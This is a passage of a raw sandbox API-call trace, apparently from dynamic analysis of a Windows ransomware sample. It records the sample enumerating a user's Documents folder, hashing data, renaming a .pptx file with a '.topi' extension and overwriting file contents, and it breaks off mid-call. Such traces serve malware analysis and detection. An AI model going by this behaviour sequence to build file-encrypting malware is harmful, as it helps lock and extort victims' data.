HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0095.048] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0095.048] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0095.048] GetCurrentThreadId () returned 0x8c4 [0095.048] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0095.048] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f5800 [0095.048] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0095.048] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df3c0 [0095.048] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0095.048] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0095.048] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0095.048] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0095.048] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.048] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.048] GetCurrentThreadId () returned 0x8c4 [0095.049] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.049] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.049] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x99e4988 [0095.049] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.049] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.049] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.049] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.049] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4988 | out: hHeap=0x680000) returned 1 [0095.049] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0095.049] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0095.049] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb510 [0095.049] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0095.049] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0095.049] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0095.049] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0095.049] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0095.049] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0095.049] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0095.049] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0095.049] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0095.049] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0095.049] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0095.049] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0095.049] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9300 [0095.049] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0095.049] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9b8 [0095.049] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0095.049] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0095.049] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0095.049] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0095.049] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0095.049] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9318 [0095.049] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0095.050] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0095.050] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0095.050] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d92e8 [0095.050] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0095.050] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0095.050] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0095.050] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jUfFVqR50da.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\juffvqr50da.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jUfFVqR50da.pptx.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\juffvqr50da.pptx.topi")) returned 1 [0095.051] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0095.051] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.051] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.052] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b3f60 | out: hHeap=0x680000) returned 1 [0095.052] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e3e160, ftCreationTime.dwHighDateTime=0x1d53bfd, ftLastAccessTime.dwLowDateTime=0x5e8e8b00, ftLastAccessTime.dwHighDateTime=0x1d57e6e, ftLastWriteTime.dwLowDateTime=0x5e8e8b00, ftLastWriteTime.dwHighDateTime=0x1d57e6e, nFileSizeHigh=0x0, nFileSizeLow=0xa504, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jxQbVDUd9ordHUbiLNq.xlsx", cAlternateFileName="JXQBVD~1.XLS")) returned 1 [0095.052] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jxQbVDUd9ordHUbiLNq.xlsx") returned=".xlsx" [0095.052] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jxQbVDUd9ordHUbiLNq.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jxqbvdud9ordhubilnq.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0095.053] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=42244) returned 1 [0095.053] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0095.055] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0xa4de, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.056] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0095.057] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df3c0) returned 1 [0095.057] CryptCreateHash (in: hProv=0x6df3c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0095.057] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0095.057] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0095.057] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0095.058] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0095.058] GetLastError () returned 0x0 [0095.058] CryptDestroyHash (hHash=0x31c7580) returned 1 [0095.058] CryptReleaseContext (hProv=0x6df3c0, dwFlags=0x0) returned 1 [0095.058] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0095.058] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0095.058] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0095.058] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0095.058] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0095.058] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.058] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0095.058] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa500) returned 0x99f72d8 [0095.058] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0095.058] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0095.058] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0095.058] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0095.058] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0095.058] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0095.058] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f1728 [0095.058] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d92d0 [0095.058] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f1770 [0095.058] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d92e8 [0095.058] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9318 [0095.058] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0095.058] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9330 [0095.058] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0095.059] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0095.059] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e8eb0 [0095.059] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x31d01f0 [0095.059] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9318 | out: hHeap=0x680000) returned 1 [0095.059] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9330 | out: hHeap=0x680000) returned 1 [0095.059] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0095.059] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0095.059] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0095.059] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0095.059] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e948 [0095.059] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d9330 [0095.059] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314df08 [0095.059] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99d9318 [0095.059] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9c8 [0095.059] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0095.059] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0095.059] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0095.059] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0095.059] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0095.059] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0095.059] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0095.059] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0095.059] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9330 | out: hHeap=0x680000) returned 1 [0095.059] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0095.059] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9318 | out: hHeap=0x680000) returned 1 [0095.059] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0095.059] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0095.059] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0095.059] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0095.059] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0095.059] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0095.059] GetCurrentThreadId () returned 0x8c4 [0095.059] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0095.059] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f5890 [0095.060] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0095.060] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df3c0 [0095.060] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0095.060] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0095.060] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0095.060] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0095.060] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.060] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.060] GetCurrentThreadId () returned 0x8c4 [0095.060] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.060] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.060] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x99e4988 [0095.060] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.060] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.060] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.060] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.060] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4988 | out: hHeap=0x680000) returned 1 [0095.060] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0095.060] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0095.060] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb510 [0095.060] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0095.060] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0095.060] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0095.060] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0095.060] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0095.060] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0095.060] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0095.060] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0095.060] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0095.060] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0095.060] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0095.060] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0095.060] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9318 [0095.060] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0095.061] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e968 [0095.061] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0095.061] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0095.061] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0095.061] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0095.061] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0095.061] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9330 [0095.061] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0095.061] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0095.061] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0095.061] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9300 [0095.061] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0095.061] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0095.061] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0095.061] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0095.061] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0095.061] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0095.061] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0095.061] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d9348 [0095.061] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0095.061] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d8eb0 [0095.061] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0095.061] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9f8 [0095.061] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0095.061] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0095.061] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0095.061] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0095.061] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9318 | out: hHeap=0x680000) returned 1 [0095.061] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9318 [0095.061] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0095.061] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e8eb0 [0095.061] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0095.061] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0095.061] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0095.062] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9300 [0095.062] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0095.062] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0095.062] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0095.062] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0095.062] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9318 | out: hHeap=0x680000) returned 1 [0095.062] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0095.062] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0095.062] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0095.062] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0095.062] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df3c0 | out: hHeap=0x680000) returned 1 [0095.062] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0095.062] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0095.062] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0095.062] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0095.062] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0095.062] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0095.062] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0095.062] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0095.062] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9348 | out: hHeap=0x680000) returned 1 [0095.062] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0095.062] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0095.062] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0095.062] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9330 | out: hHeap=0x680000) returned 1 [0095.062] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9300 | out: hHeap=0x680000) returned 1 [0095.062] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0095.062] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0095.062] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0095.062] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d92e8 | out: hHeap=0x680000) returned 1 [0095.062] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f1770 | out: hHeap=0x680000) returned 1 [0095.063] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0095.063] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0095.063] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb510 | out: hHeap=0x680000) returned 1 [0095.063] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0095.063] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0095.063] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0095.063] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0095.063] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0095.063] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0095.063] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0095.063] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0095.063] WriteFile (in: hFile=0x6a8, lpBuffer=0x99f72d8*, nNumberOfBytesToWrite=0xa4ff, 